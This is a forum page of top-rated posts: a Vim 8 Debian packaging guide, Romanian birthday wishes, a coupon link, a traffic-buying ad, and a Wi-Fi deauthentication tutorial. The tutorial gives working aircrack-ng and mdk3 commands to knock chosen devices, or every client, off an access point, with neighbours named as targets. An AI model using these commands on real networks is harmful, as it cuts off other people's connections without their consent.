Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 09/14/16 in all areas

  1. So, fellow insane penguins, after 10 years we get a new vim release, specifically 8.0. It is the first major version after all these years and we have alot of goodies and features packed up. As vim is considered one of the best terminal based text editors in linux, i am sure alot of people will be hapy to get their hands on it. But enough with the chit-chat and let’s see what new features vim 8 brings with it: – Asynchronous I/O support, channels, JSON – Jobs – Timers – Partials, Lambdas and Closures – Packages – New style testing – Viminfo merged by timestamp – GTK+ 3 support – MS-Windows DirectX support If oyu would like to see all the changes and new fetaures added you can check the CHANGELOG. Anyhow, the purpose of this article is to describe the fastest way to make a .deb package from vim8 sources and have it installed on your Debian. I’m using Debian 8.5 (Jessie) so if you are trying to doit on a different system make sure you know what you are doing. First, we need to install the pre-requisites. We need checkinstall in order to build the .deb packages and the ncurses libraries (i chose ncurses but you can use any other terminal handling libraries) root@debian:/usr/src# apt-get install checkinstall libncurses5-dev Now we need to clone the vim git repository so we switch to ‘/usr/src’ and clone it there, then we switch the working directory to ‘vim’ root@debian:~# cd /usr/src root@debian:/usr/src# git clone https://github.com/vim/vim.git root@debian:/usr/src# cd vim While in the ‘vim’ directory, we first need to configure it, so it detects the system and see if we miss anything. If there’s anything missing the ‘./configure script will spit out a nice error that will tell you what is missing. On my end i had everything installed. Usually checkinstall should install it’s dependencies when you install it. But, back to the scope of this article. root@debian:/usr/src/vim# ./configure After ‘./configure’ script is done you will simply need to issue the ‘checkinstall’ command. Here you will be presented with 13 options that you can edit as it follows: root@debian:/usr/src/vim# checkinstall checkinstall 1.6.2, Copyright 2009 Felipe Eduardo Sanchez Diaz Duran This software is released under the GNU GPL. ***************************************** **** Debian package creation selected *** ***************************************** This package will be built according to these values: 0 - Maintainer: [ root@debian ] 1 - Summary: [ ] 2 - Name: [ vim ] 3 - Version: [ 20160914 ] 4 - Release: [ 1 ] 5 - License: [ GPL ] 6 - Group: [ checkinstall ] 7 - Architecture: [ amd64 ] 8 - Source location: [ vim ] 9 - Alternate source location: [ ] 10 - Requires: [ ] 11 - Provides: [ vim ] 12 - Conflicts: [ ] 13 - Replaces: [ ] Feel free to edit each of these options as you may see fit. Upon successful completion, ‘checkinstall’ will generate the .deb package and also install it automatically. ********************************************************************** Done. The new package has been installed and saved to /usr/src/vim/vim_8.0.3-20160914-1_amd64.deb You can remove it from your system anytime using: dpkg -r vim ********************************************************************** Source: http://insanepengu.in
    1 point
  2. Pentru cine are nevoie de cupoane valorice va recomand cu caldura: http://tools.seobook.com/ppc-tools/free-ppc-ad-coupons.html
    1 point
  3. Unei singure fiinţe din viaţa mea îi datorez tot ceea ce eu am şi ceea ce sunt azi. Ea mi-a dat naştere, m-a crescut şi m-a învăţat să iubesc. Nu există cuvinte care să o descrie! Te iubesc, mama! La mulţi ani!
    1 point
  4. Dacă viaţa ta ar depinde de dragostea pe care ţi-o port, ai fi nemuritoare. La mulţi ani, mama!
    1 point
  5. 1 point
  6. Requirements: OS: Linux Wireless card with support for: injection and monitor mode. Packages: aircrack-ng (http://www.aircrack-ng.org/) mdk3 (http://aspj.aircrack-ng.org/) (You should be able to find these in your repos.) Its possible to do this with just aircrack-ng but I prefer mdk3 for the actual deauthing. If you know your system skip the first steps. 1. First thing we need to do is see if your wireless card supports injection and monitor mode. For the sake of this tip we will call your wireless device wlan0. If you need to know what yours is type this command. ifconfig -a Now look for the wlan# that you want to use. Most people will only have one unless your like me and use two wireless cards. 2. Take your card down with this command ifconfig wlan0 down For testing injection type this: aireplay-ng -9 wlan0 You should get something back that says "Injection is working!" 3. Now to test if your card support monitor mode. We first need the physical name of the wireless card. For this run. airmon-ng Identify your card on the list and look for the phy# 4. Once you have it run this but replace phy0 with yours. iw phy phy0 info |grep -A8 modes Under supported interface modes it should have "monitor" listed. So if everything’s cool lets move on. If not you may need newer drivers or a different wireless card. I recommend the Alfa USB WiFi AWUS036H. Now we are ready to have some fun. 5. You need to get some info about your access point to proceed. So at this point disconnect from your network and lets get to it.Use this command to get info about your access point. airodump-ng wlan0 This should start packet capturing all wireless traffic. Once you see yours hit Ctrl+C to cancel the capture. Take note of your essid, mac address, and channel. 6. Once you have it lets take a closer look at who is on line with the same command but a little different. A.) Bring your network card back up with this command. ifconfig wlan0 up B.) change your channel with iwconfig like this. My channel is 6. Make sure you use the channel you got earlier. iwconfig wlan0 channel 6 C.)Bring your wireless card back down. ifconfig wlan0 down D.) Now its time to find out who's on line. Run this command below. airodump-ng -c 6 --bssid {mac address for access point} wlan0 -c is for the channel number --bssid is for your mac address on your access point.If you want to store the captured packets just add the -w option with the location you want to store the capture files. This would look like this airodump-ng -c 6 --bssid {mac address for access point} -w {path and name of file} wlan0 Once airodump-ng starts running if you see something on the end of the top line that says something like stuck on channel -1 then you suffered from the same bug I did. To fix it hit Ctrl+C and run these two commands and then start over on step a. airmon-ng stop mon0 airmon-ng stop wlan0 If you don't see that error then your good. Now kick back and watch the stations appear. Each system on the network will show up at the bottom as they use the wireless. You can cross reference the first three MAC segments xx:xx:xx on line to see the manufacturer until you find your pray. For me it was my daughters Kindle Fire. Once you see the device you want to kick off the network write down the mac address and hit Ctrl+C to stop the packet capture. Now finally for the moment of truth. Which family member do you have in your sites. Once you pick one run this command. echo "xx:xx:xx:xx:xx:xx" > ./black.lst Replace the "xx" with the mac address of the victim. This creates a list of mac addresses you want to kick. If you want to add more then one change the > to >>. The final command. mdk3 wlan0 d -n {essid} -b ./black.lst replace {essid} with the essid of the access point. That's it. As long as the command runs they will be kicked off line. Unless they spoof there mac address or use another access point. This also works well for neighbors that your wife gives the pass-phrase out to. You can take this a step further and kick everyone off the access point with this command. mdk3 wlan0 d -n {essid} By just leaving out the black list you will kick off everyone on that access point. To stop the attack just hit Ctrl+C to kill the command and everyone will be able to connect again. Have fun and remember its cool to play with your own equipment but don't cause trouble for other people. That's not nice. ;-) sharkyz: If I have time tomorrow I'll update with a bash or python script to do all this. (If you know your system and wireless card you just need the packages and the last commands) source: http://www.thelinuxgeek.com/content/linux-tip-wireless-deauthing
    1 point
  7. Cumpar trafic adult si NON-ADULT Indiferent de cantitate incepand de la 100 unici per zi - pana la 100.000 unici. Traficul sa fie real ( exclus hitleap sau alte bazaconii ) Bugetul este negociabil in functie de cantitate
    -1 points
×
×
  • Create New...